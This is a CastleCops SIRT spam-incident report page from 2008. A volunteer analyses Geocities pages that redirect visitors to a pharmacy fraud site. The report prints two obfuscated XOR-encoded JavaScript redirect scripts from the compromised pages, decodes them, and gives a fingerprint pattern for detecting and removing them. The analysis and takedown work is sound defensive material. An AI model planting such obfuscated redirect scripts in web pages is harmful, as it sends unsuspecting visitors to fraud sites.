CastleCops, Internet Crime Fighters
Need help? Click here to register for free! Absolutely zero advertisements on this site!

$9736.22 of $21422.68
left sidedonated so farneed $11686.46 donated to reach our goalright side, our goal
Help CastleCops serve the community on new servers, Donate Here to reach our goal.

Donation/Premium
spacer
Donations. Become Premium Today! Premium Icon
block bottom
Security Central
spacer
· Home
· PIRT/Fried Phish
· MIRT
· SIRT
· Deutsch
· Wiki
· Newsletter
· O16/ActiveX
· CLSID List
· Contest2007
· Downloads
· Feedback (send)
· Forums
· HijackThis
· Hijacktrend
· LSPs
· My Downloads
· O18
· O20
· O21
· O22
· O23
· O9
· Premium
· Private Messages
· Proxomitron
· Reviews
· Search
· StartupList
· Stories Archive
· Submit News
· WsIRT
· Your Account
· Acceptable Use Policy
block bottom
Survey
spacer
Was 2007 a good year?

Yes it was a wonderful year
Yes, but there is always room for improvement
Status quo
It was a challenge
Other (leave comment)



Results
Polls

Votes: 927
Comments: 25
block bottom
spacer spacer

SIRT(TM)

Spam Incident Reporting and Termination(TM) Squad

A global spam termination operation launched by CastleCops, the volunteer SIRT Squad is comprised of folks who report spam, investigate spam, and actively work on spam takedown and termination. SIRT is funded by CastleCops. Become a SIRT Squad terminator by reporting spam today!

[ How-To / FAQ ]

SIRT -> Confirmed Spam | Terminated Spam


evidence status: confirmed spam

HTTP Response
06 Jul, 2008
10:22:16		HTTP/1.1 403 Forbidden
ID174335 (termination link)
TitleGeocities redirect
Entry
SIRT Squad
Reporter		tembow
Timestamp16 May, 2008 @ 01:08:29
Topic ID221815 - Read/respond to SIRT commentary.
Handler Note:
16 May, 2008
01:26:40		tembow: Consumed following related reports:

[174336] http://geocities.com/dirkgill96/
Handler Note:
16 May, 2008
01:38:06		tembow: Two examples of Yahoo Geocities redirections to a Canadian Pharmacy fraud site. This report contains
(1) and (2) the sample redirection scripts from the sites & the decoding of those scripts,
(3) the generic fingerprint that identifies these malicious redirections
(4) the method to rid Geocities of this huge infection which is occurring at an abuse rate of 800 per day, as seen at http://rss.uribl.com/hosters/geocities_com.html

(1) Sample redirection script for "dirkgill96"

var epoa='cqcxsnkyjlbtyfinwycuvgl';
var zxry=0;
var gzqsflk, rknmly, fiaknnc='5F02000A1A1E1F59060D0C130C070E0B4A5B291400063F00030A08074C550E0302061B0E481D0107570F1A1506180A1E0D561B1C0E1F4A5 1425311121D1E4D564C101715180B141B19101A451A0501454F45491A0D0510130148';
rknmly='';
var gzyw;
for( gzqsflk=0;
gzqsflk < fiaknnc.length;
gzqsflk+=2){gzyw = unescape( '%' + fiaknnc.substr( gzqsflk,2));
rknmly += String.fromCharCode( gzyw.charCodeAt(0) ^ epoa.charCodeAt(zxry++) );
if ( zxry >= epoa.length ) zxry = 0;
}document.write(rknmly);

Decodes to

<script language="JavaScript">window.top.location.href = 'http://earthexact.com';</script>



(2) Sample redirection script for "franciscopark37"

var punwiu='cqapugtvldb';
var zozdjs=0;
var tfbkr, yhwxje, lybn='5F0202021C17005600050C04040017105A563C0D120330121319051356481B0D0C071E165E01080458000B010205081F1B491C040902425E51 46180113044C434B0702031518101F1515184A010C1C464B494807151E0D12174F';
yhwxje='';
var dtem;
for( tfbkr=0;
tfbkr < lybn.length;
tfbkr+=2){dtem = unescape( '%' + lybn.substr( tfbkr,2));
yhwxje += String.fromCharCode( dtem.charCodeAt(0) ^ punwiu.charCodeAt(zozdjs++) );
if ( zozdjs >= punwiu.length ) zozdjs = 0;
}document.write(yhwxje);

Decodes to

<script language="JavaScript">window.top.location.href = 'http://earthexact.com';</script>


(3) Generic fingerprint for redirection scripts starts with
var {TS}='{TSLONG}';var {TS}=0;var{TS}, {TS}, {TS}='{HEX}';{TS}='';var {TS};for( {TS}=0;{TS} < {TS}.length;{TS}+=2){{TS} = unescape( '%' + {TS}.substr( {TS},2));

where {TS} is a variable lower case text string of 3 - 9 characters
and {TSLONG} is a longer lower case text string 5 - 40 characters
and {HEX} is a long hexadecimal character string compring the set 0-9, A-F

(4) Using this generic fingerprint, scan every Geocities page, and remove every page that matches. Keep running the scan and removal until the abuse ceases. Monitor for changes in the fingerprint and adjust accordingly.


Handler Note:
16 May, 2008
01:40:54		tembow: NOTE: This is a pervasive problem with serious consequences for Yahoo's reputation and integrity.
Escalate this issue immediately to the Corporate Security level for implementation.
Handler Note:
16 May, 2008
01:42:40		tembow: Generated and sent email spam alert to respective parties.
Fetched URLs
Slaves174336,

Report for at 16 May, 2008 @ 00:51:38

fetched page

at 16 May, 2008 @ 00:51:51
MD5 Fingerprint: 08266afaf17e305a81e52d00c3c04b93
SHA1 Fingerprint: 968fbf60f12a77f3c228bfabf2cc258def25bcd1

fetched page

at 16 May, 2008 @ 01:27:17
MD5 Fingerprint: 0aa0f75ec944007ddf801b5375edf423
SHA1 Fingerprint: 1953bf695e4127d50f2753cf1b92da9724c700fc
Version 1.0
2002-2008 © Computer Cops LLC dba CastleCops®. All rights reserved.
Acceptable Use Policy. Use signifies your agreement.
157ppm 0.942s (0.803s)
Making cybercriminals unhappy since 2002*
In Memory of Trpm
spacer spacer